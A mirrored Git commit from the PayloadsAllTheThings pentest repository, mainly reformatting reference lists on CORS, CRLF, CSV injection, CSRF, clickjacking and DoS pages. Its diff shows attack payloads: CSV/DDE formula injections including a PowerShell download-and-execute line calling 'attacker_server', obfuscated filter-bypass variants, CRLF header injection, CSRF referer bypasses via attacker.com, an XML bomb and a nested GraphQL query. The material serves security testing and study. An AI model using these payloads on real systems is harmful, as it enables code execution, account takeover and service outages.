mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
References updated for CORS CRLF CSV
This commit is contained in:
parent
4dc409d31e
commit
e138308d3d
@ -264,9 +264,9 @@ function reqListener() {
|
||||
|
||||
## References
|
||||
|
||||
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
|
||||
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
||||
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
||||
* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
|
||||
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
|
||||
- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||
- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
|
||||
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
|
||||
- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
|
@ -4,16 +4,18 @@
|
||||
|
||||
> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
- [CRLF - Add a cookie](#crlf---add-a-cookie)
|
||||
- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
|
||||
- [CRLF - Write HTML](#crlf---write-html)
|
||||
- [CRLF - Filter Bypass](#crlf---filter-bypass)
|
||||
- [Add a cookie](#add-a-cookie)
|
||||
- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
|
||||
- [Write HTML](#write-html)
|
||||
- [Filter Bypass](#filter-bypass)
|
||||
- [Labs](#labs)
|
||||
- [References](#references)
|
||||
|
||||
## CRLF - Add a cookie
|
||||
|
||||
## Add a cookie
|
||||
|
||||
Requested page
|
||||
|
||||
@ -36,7 +38,8 @@ x-content-type-options: nosniff
|
||||
x-xss-protection: 1; mode=block
|
||||
```
|
||||
|
||||
## CRLF - Add a cookie - XSS Bypass
|
||||
|
||||
## Add a cookie - XSS Bypass
|
||||
|
||||
Requested page
|
||||
|
||||
@ -67,7 +70,8 @@ X-XSS-Protection:0
|
||||
0
|
||||
```
|
||||
|
||||
## CRLF - Write HTML
|
||||
|
||||
## Write HTML
|
||||
|
||||
Requested page
|
||||
|
||||
@ -89,7 +93,8 @@ Content-Length: 34
|
||||
<html>You have been Phished</html>
|
||||
```
|
||||
|
||||
## CRLF - Filter Bypass
|
||||
|
||||
## Filter Bypass
|
||||
|
||||
Using UTF-8 encoding
|
||||
|
||||
@ -99,18 +104,18 @@ Using UTF-8 encoding
|
||||
|
||||
Remainder:
|
||||
|
||||
* %E5%98%8A = %0A = \u560a
|
||||
* %E5%98%8D = %0D = \u560d
|
||||
* %E5%98%BE = %3E = \u563e (>)
|
||||
* %E5%98%BC = %3C = \u563c (<)
|
||||
* `%E5%98%8A` = `%0A` = \u560a
|
||||
* `%E5%98%8D` = `%0D` = \u560d
|
||||
* `%E5%98%BE` = `%3E` = \u563e (>)
|
||||
* `%E5%98%BC` = `%3C` = \u563c (<)
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
|
||||
* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* https://www.owasp.org/index.php/CRLF_Injection
|
||||
* https://vulners.com/hackerone/H1:192749
|
||||
- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
|
||||
- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - 2016-12-20](https://vulners.com/hackerone/H1:192749)
|
@ -4,44 +4,58 @@ Many web applications allow the user to download content such as templates for i
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic exploit with Dynamic Data Exchange
|
||||
Basic exploits with **Dynamic Data Exchange**.
|
||||
|
||||
|
||||
Payload: pop a calc
|
||||
|
||||
```powershell
|
||||
# pop a calc
|
||||
DDE ("cmd";"/C calc";"!A0")A0
|
||||
@SUM(1+1)*cmd|' /C calc'!A0
|
||||
=2+5+cmd|' /C calc'!A0
|
||||
```
|
||||
|
||||
# pop a notepad
|
||||
Payload: pop a notepad
|
||||
|
||||
```powershell
|
||||
=cmd|' /C notepad'!'A1'
|
||||
```
|
||||
|
||||
# powershell download and execute
|
||||
Payload: powershell download and execute
|
||||
|
||||
```powershell
|
||||
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
|
||||
```
|
||||
|
||||
# msf smb delivery with rundll32
|
||||
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
|
||||
Payload: Prefix obfuscation and command chaining
|
||||
|
||||
# Prefix obfuscation and command chaining
|
||||
```powershell
|
||||
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
|
||||
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
|
||||
+thespanishinquisition(cmd|'/c calc.exe'!A
|
||||
= cmd|'/c calc.exe'!A
|
||||
|
||||
# Using rundll32 instead of cmd
|
||||
=rundll32|'URL.dll,OpenURL calc.exe'!A
|
||||
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
|
||||
|
||||
# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
|
||||
= C m D | '/ c c al c . e x e ' ! A
|
||||
|
||||
```
|
||||
|
||||
Technical Details of the above payload:
|
||||
Payload: Using rundll32 instead of cmd
|
||||
|
||||
```powershell
|
||||
=rundll32|'URL.dll,OpenURL calc.exe'!A
|
||||
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
|
||||
```
|
||||
|
||||
Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
|
||||
|
||||
```powershell
|
||||
= C m D | '/ c c al c . e x e ' ! A
|
||||
```
|
||||
|
||||
Technical details of the above payloads:
|
||||
|
||||
- `cmd` is the name the server can respond to whenever a client is trying to access the server
|
||||
- `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
|
||||
- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
|
||||
|
||||
|
||||
Any formula can be started with
|
||||
|
||||
```powershell
|
||||
@ -51,13 +65,13 @@ Any formula can be started with
|
||||
@
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
|
||||
* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
|
||||
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
|
||||
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
|
||||
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
|
||||
* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
|
||||
* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
|
||||
|
||||
- [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection)
|
||||
- [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
|
||||
- [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://payatu.com/csv-injection-basic-to-exploit/)
|
||||
- [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/)
|
||||
- [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html)
|
||||
- [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
|
||||
- [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
|
@ -83,17 +83,18 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
|
||||
</form>
|
||||
```
|
||||
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
|
||||
```html
|
||||
<button onclick="submitForm()">Click me</button>
|
||||
<form action="legitimate-site" method="POST" id="hidden-form">
|
||||
<!-- Hidden form fields -->
|
||||
</form>
|
||||
<script>
|
||||
function submitForm() {
|
||||
document.getElementById('hidden-form').submit();
|
||||
}
|
||||
</script>
|
||||
```
|
||||
|
||||
```html
|
||||
<button onclick="submitForm()">Click me</button>
|
||||
<form action="legitimate-site" method="POST" id="hidden-form">
|
||||
<!-- Hidden form fields -->
|
||||
</form>
|
||||
<script>
|
||||
function submitForm() {
|
||||
document.getElementById('hidden-form').submit();
|
||||
}
|
||||
</script>
|
||||
```
|
||||
|
||||
### Execution Methods
|
||||
|
||||
|
@ -16,11 +16,6 @@
|
||||
* [JSON GET - Simple Request](#json-get---simple-request)
|
||||
* [JSON POST - Simple Request](#json-post---simple-request)
|
||||
* [JSON POST - Complex Request](#json-post---complex-request)
|
||||
* [Bypass referer header validation check](#bypass-referer-header-validation)
|
||||
* [Basic payload](#basic-payload)
|
||||
* [With question mark payload](#with-question-mark-payload)
|
||||
* [With semicolon payload](#with-semicolon-payload)
|
||||
* [With subdomain payload](#with-subdomain-payload)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
@ -151,65 +146,32 @@ xhr.send('{"role":admin}');
|
||||
</script>
|
||||
```
|
||||
|
||||
## Bypass referer header validation
|
||||
|
||||
### Basic payload
|
||||
```
|
||||
1) Open https://attacker.com/csrf.html
|
||||
2) Referer header is ..
|
||||
|
||||
Referer: https://attacker.com/csrf.html
|
||||
```
|
||||
### With question mark(`?`) payload
|
||||
```
|
||||
1) Open https://attacker.com/csrf.html?trusted.domain.com
|
||||
2) Referer header is ..
|
||||
|
||||
Referer: https://attacker.com/csrf.html?trusted.domain.com
|
||||
```
|
||||
|
||||
### With semicolon(`;`) payload
|
||||
```
|
||||
1) Open https://attacker.com/csrf.html;trusted.domain.com
|
||||
2) Referer header is ..
|
||||
|
||||
Referer: https://attacker.com/csrf.html;trusted.domain.com
|
||||
```
|
||||
|
||||
### With subdomain payload
|
||||
```
|
||||
1) Open https://trusted.domain.com.attacker.com/csrf.html
|
||||
2) Referer headers is ..
|
||||
|
||||
Referer: https://trusted.domain.com.attacker.com/csrf.html
|
||||
```
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
|
||||
* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
|
||||
* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
|
||||
* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
|
||||
* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
|
||||
* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
|
||||
* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
|
||||
* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
|
||||
* [PortSwigger - CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
|
||||
* [PortSwigger - CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
|
||||
* [PortSwigger - CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
|
||||
* [PortSwigger - CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
|
||||
* [PortSwigger - CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
|
||||
* [PortSwigger - CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
|
||||
* [PortSwigger - CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
|
||||
* [PortSwigger - CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
|
||||
- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
|
||||
- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/)
|
||||
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
|
||||
- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/)
|
||||
- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820)
|
||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
|
||||
- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
|
||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
|
||||
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
||||
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
||||
- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
|
||||
- [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
|
||||
- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://whitton.io/articles/messenger-site-wide-csrf/)
|
||||
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
|
||||
- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
|
||||
- [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://hackerone.com/reports/100820)
|
||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
|
||||
- [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
|
||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://hackerone.com/reports/245346)
|
||||
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
||||
- [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
||||
- [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://www.youtube.com/watch?v=eWEgUcHPle0)
|
||||
- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
|
||||
- [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
|
||||
- [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
|
@ -5,12 +5,16 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [DoS - Locking Customer Accounts](#dos---locking-customer-accounts)
|
||||
* [DoS - File Limits on FileSystem](#dos---file-limits-on-filesystem)
|
||||
* [DoS - Memory Exhaustion - Technology Related](#dos---memory-exhaustion---technology-related)
|
||||
* [Examples](#examples)
|
||||
* [Locking Customer Accounts](#locking-customer-accounts)
|
||||
* [File Limits on FileSystem](#file-limits-on-filesystem)
|
||||
* [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## DoS - Locking Customer Accounts
|
||||
## Examples
|
||||
|
||||
### Locking Customer Accounts
|
||||
|
||||
Example of Denial of Service that can occur when testing customer accounts.
|
||||
Be very careful as this is most likely **out-of-scope** and can have a high impact on the business.
|
||||
@ -21,7 +25,7 @@ Be very careful as this is most likely **out-of-scope** and can have a high impa
|
||||
```
|
||||
|
||||
|
||||
## DoS - File Limits on FileSystem
|
||||
### File Limits on FileSystem
|
||||
|
||||
When a process is writing a file on the server, try to reach the maximum number of files allowed by the filesystem format. The system should output a message: `No space left on device` when the limit is reached.
|
||||
|
||||
@ -41,9 +45,9 @@ FAT32 has a significant limitation of **4 GB**, which is why it's often replaced
|
||||
Modern filesystems like BTRFS, ZFS, and XFS support exabyte-scale files, well beyond current storage capacities, making them future-proof for large datasets.
|
||||
|
||||
|
||||
## DoS - Memory Exhaustion - Technology Related
|
||||
### Memory Exhaustion - Technology Related
|
||||
|
||||
Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory
|
||||
Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory.
|
||||
|
||||
* **XML External Entity**: Billion laughs attack/XML bomb
|
||||
```xml
|
||||
@ -63,7 +67,22 @@ Depending on the technology used by the website, an attacker may have the abilit
|
||||
]>
|
||||
<lolz>&lol9;</lolz>
|
||||
```
|
||||
* **GraphQL**: Deep Query
|
||||
* **GraphQL**: Deeply-nested GraphQL queries.
|
||||
```ps1
|
||||
query {
|
||||
repository(owner:"rails", name:"rails") {
|
||||
assignableUsers (first: 100) {
|
||||
nodes {
|
||||
repositories (first: 100) {
|
||||
nodes {
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
* **Image Resizing**: try to send invalid pictures with modified headers, e.g: abnormal size, big number of pixels.
|
||||
* **SVG handling**: SVG file format is based on XML, try the billion laughs attack.
|
||||
* **Regular Expression**: ReDoS
|
||||
@ -71,5 +90,5 @@ Depending on the technology used by the website, an attacker may have the abilit
|
||||
|
||||
## References
|
||||
|
||||
* [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - 16 oct. 2024](https://youtu.be/b7WlUofPJpU)
|
||||
* [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
|
||||
- [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://youtu.be/b7WlUofPJpU)
|
||||
- [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
|
Loading…
Reference in New Issue
Block a user